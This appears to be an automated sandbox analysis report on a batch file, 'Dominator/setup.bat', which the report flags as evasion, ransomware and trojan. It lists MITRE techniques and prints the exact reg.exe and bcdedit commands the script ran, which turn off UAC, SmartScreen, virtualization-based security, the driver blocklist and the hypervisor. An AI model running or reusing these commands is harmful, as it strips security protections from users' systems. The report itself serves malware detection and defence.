79abbd6f55d763c6c0af8885cc573dcfaf36059822dc6f2db005242578e0909b

Analysis

max time kernel
122s
max time network
124s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
12-03-2024 18:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Dominator/setup.bat
Size

1KB
MD5

79b066c8b719dee74dc5b74fec87808c
SHA1

497109077a04f04a39f1ab1c62095b7a0b9a0d8b
SHA256

af724b5016ba21fdd43078319a481cd97244fd33d08189d1971945036fcf4e7c
SHA512

34cb0b4eb82018c22889658d33df44aab32cd114c17cf3125cc71e2f7668956ff8f7a8b6a5688ecec496df6b91f72fe10b7c66fc8c39c947ecb1897f4dd56a17

Score

10^/10

evasion ransomware trojan

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
2672	bcdedit.exe

Runs net.exe

Suspicious use of WriteProcessMemory 33 IoCs

description	pid	Process	procid_target
PID 2156 wrote to memory of 1320	2156	cmd.exe	29
PID 2156 wrote to memory of 1320	2156	cmd.exe	29
PID 2156 wrote to memory of 1320	2156	cmd.exe	29
PID 1320 wrote to memory of 2824	1320	net.exe	30
PID 1320 wrote to memory of 2824	1320	net.exe	30
PID 1320 wrote to memory of 2824	1320	net.exe	30
PID 2156 wrote to memory of 2608	2156	cmd.exe	31
PID 2156 wrote to memory of 2608	2156	cmd.exe	31
PID 2156 wrote to memory of 2608	2156	cmd.exe	31
PID 2156 wrote to memory of 2120	2156	cmd.exe	32
PID 2156 wrote to memory of 2120	2156	cmd.exe	32
PID 2156 wrote to memory of 2120	2156	cmd.exe	32
PID 2156 wrote to memory of 2368	2156	cmd.exe	33
PID 2156 wrote to memory of 2368	2156	cmd.exe	33
PID 2156 wrote to memory of 2368	2156	cmd.exe	33
PID 2156 wrote to memory of 3036	2156	cmd.exe	34
PID 2156 wrote to memory of 3036	2156	cmd.exe	34
PID 2156 wrote to memory of 3036	2156	cmd.exe	34
PID 2156 wrote to memory of 3052	2156	cmd.exe	35
PID 2156 wrote to memory of 3052	2156	cmd.exe	35
PID 2156 wrote to memory of 3052	2156	cmd.exe	35
PID 2156 wrote to memory of 2520	2156	cmd.exe	36
PID 2156 wrote to memory of 2520	2156	cmd.exe	36
PID 2156 wrote to memory of 2520	2156	cmd.exe	36
PID 2156 wrote to memory of 2544	2156	cmd.exe	37
PID 2156 wrote to memory of 2544	2156	cmd.exe	37
PID 2156 wrote to memory of 2544	2156	cmd.exe	37
PID 2156 wrote to memory of 2224	2156	cmd.exe	38
PID 2156 wrote to memory of 2224	2156	cmd.exe	38
PID 2156 wrote to memory of 2224	2156	cmd.exe	38
PID 2156 wrote to memory of 2672	2156	cmd.exe	39
PID 2156 wrote to memory of 2672	2156	cmd.exe	39
PID 2156 wrote to memory of 2672	2156	cmd.exe	39

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Dominator\setup.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2156
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1320
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:2824
- C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverride /t REG_DWORD /d 3 /f
  2⤵
  PID:2608
- C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverrideMask /t REG_DWORD /d 3 /f
  2⤵
  PID:2120
- C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\CI\Config" /v VulnerableDriverBlocklistEnable /t REG_DWORD /d 0 /f
  2⤵
  PID:2368
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d 0 /f
  2⤵
  PID:3036
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 0 /f
  2⤵
  PID:3052
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t "REG_SZ" /d "Off" /f
  2⤵
  PID:2520
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Edge\SmartScreenEnabled" /v "" /t "REG_DWORD" /d 0 /f
  2⤵
  PID:2544
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t "REG_DWORD" /d 0 /f
  2⤵
  - UAC bypass
  PID:2224
- C:\Windows\system32\bcdedit.exe
  bcdedit /set hypervisorlaunchtype off
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2672